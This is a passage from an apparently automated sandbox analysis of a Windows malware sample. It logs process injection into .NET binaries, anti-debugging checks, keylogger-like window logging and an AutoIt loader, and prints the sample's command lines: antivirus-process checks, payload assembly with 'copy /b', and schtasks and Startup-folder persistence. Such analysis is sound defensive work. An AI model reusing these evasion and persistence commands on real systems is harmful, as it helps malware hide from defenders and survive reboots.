                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -57922s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6484Thread sleep time: -57812s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1532Thread sleep count: 200 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1532Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5016Thread sleep count: 3776 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5016Thread sleep time: -11328000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5016Thread sleep count: 5761 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5016Thread sleep time: -17283000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pif TID: 6516Thread sleep time: -42000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pif TID: 4068Thread sleep time: -3555000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426864 FindFirstFileW,FindClose,0_2_00426864
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,4_2_0041B42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0044D5E9 FindFirstFileExA,4_2_0044D5E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,4_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00406AC2 FindFirstFileW,FindNextFileW,4_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,4_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00418C69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,4_2_00408DA7
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeCode function: 5_2_004062D5 FindFirstFileW,FindClose,5_2_004062D5
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeCode function: 5_2_00402E18 FindFirstFileW,5_2_00402E18
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeCode function: 5_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00406C9B
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001EE334 GetFileAttributesW,FindFirstFileW,FindClose,23_2_001EE334
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001FA32C FindFirstFileW,Sleep,FindNextFileW,FindClose,23_2_001FA32C
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001F65AE FindFirstFileW,FindNextFileW,FindClose,23_2_001F65AE
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001BC6C2 FindFirstFileExW,23_2_001BC6C2
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001F7205 FindFirstFileW,FindClose,23_2_001F7205
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001F72A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,23_2_001F72A6
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001ED7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_001ED7CC
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001EDB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_001EDB0B
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001F9E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_001F9E43
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001F9F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_001F9F9E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_00406F06
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001829A4 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,23_2_001829A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 60000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59874Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59212Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58999Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58667Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58124Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57905Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57796Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57466Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56782Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 369000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59659Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59406Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59291Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59077Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58843Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58406Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58276Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57922Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57812Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\88473\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\88473Jump to behavior
                    Source: MSBuild.exe, 00000004.00000002.4531361836.0000000001188000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4531361836.0000000001201000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: csc.exe, 00000002.00000002.4534522380.00000000095C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-64116
                    Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-64155
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifProcess information queried: ProcessInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 2_2_094DF910 rdtsc 2_2_094DF910
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001FF2E8 BlockInput,23_2_001FF2E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043A65D
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00434350 LoadLibraryW,GetProcAddress,0_2_00434350
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00442554 mov eax, dword ptr fs:[00000030h]4_2_00442554
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001A5108 mov eax, dword ptr fs:[00000030h]23_2_001A5108
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0044E92E GetProcessHeap,4_2_0044E92E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00434168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043A65D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00433B44
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00433CD7 SetUnhandledExceptionFilter,4_2_00433CD7
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001B29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_001B29B2
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001A0C5F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_001A0C5F
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001A0DF5 SetUnhandledExceptionFilter,23_2_001A0DF5
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001A1041 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_001A1041
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 550000 protect: page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 550000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 550000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 6E7008Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: C8E008Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe4_2_00410F36
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001E1A7B LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,23_2_001E1A7B
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_0018331E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,23_2_0018331E
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004324DC IsWindow,GetKeyboardState,GetKeyboardState,keybd_event,keybd_event,SetForegroundWindow,GetKeyboardState,keybd_event,0_2_004324DC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00418754 mouse_event,4_2_00418754
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Demo Demo.cmd & Demo.cmdJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 88473Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "partitionhansenincorporatemichigan" Classics Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Mat + ..\Customize + ..\Downloadcom + ..\Damn + ..\Stylus + ..\Guarantees + ..\Directories + ..\Alice + ..\Pros + ..\Graham TJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\88473\Defensive.pif Defensive.pif TJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr" "C:\Users\user\AppData\Local\DataSync Dynamics\P"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr" "C:\Users\user\AppData\Local\DataSync Dynamics\P"
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\musessync.url" & echo url="c:\users\user\appdata\local\datasync dynamics\musessync.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\musessync.url" & exit
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\musessync.url" & echo url="c:\users\user\appdata\local\datasync dynamics\musessync.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\musessync.url" & exit
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001E13DC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,23_2_001E13DC
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001E1EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,23_2_001E1EDD
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managera _
                    Source: ywezrgl.exe, 00000005.00000003.2372891736.00000000028F0000.00000004.00000020.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000003.2439180607.000000000420E000.00000004.00000800.00020000.00000000.sdmp, Defensive.pif, 0000000F.00000000.2416835168.0000000000733000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4531361836.00000000011FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: file.exe, QuickTextPaste.exe.0.drBinary or memory string: WidthBytes: %d bmWidth:%d bmBitsPixel:%d hb:%dNo-HBitmap<br>0};%d,UCHAR img_data[]={int ys=%d;int xs=%d;No HBITMAPShell_TrayWndTrayNotifyWndC:\shell32SetMenuInfoNULL
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4531361836.00000000011E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/11/19 09:57:51 Program Manager]
                    Source: MSBuild.exe, 00000004.00000002.4531361836.0000000001188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/11/19 09:57:25 Program Manager]
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /11/19 09:57:38 Program Manager]
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4531361836.00000000011E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/11/19 09:57:38 Program Manager]
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager*
                    Source: file.exe, QuickTextPaste.exe.0.drBinary or memory string: GDtGDXGDHGDWorkerWSysListView32SHELLDLL_DefViewProgram ManagerUniformResourceLocatorToolbarWindow32SHAutoCompleteSHLWAPI.DLLBackInternet Explorer_Server
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernet/
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG
                    Source: file.exe, MusesSync.scrBinary or memory string: Shell_TrayWnd
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [2024/11/19 09:57:32 Program Manager]
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerv
                    Source: MSBuild.exe, 00000004.00000002.4531361836.00000000011E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG<
                    Source: MSBuild.exe, 00000004.00000002.4531361836.0000000001188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program ManagerD
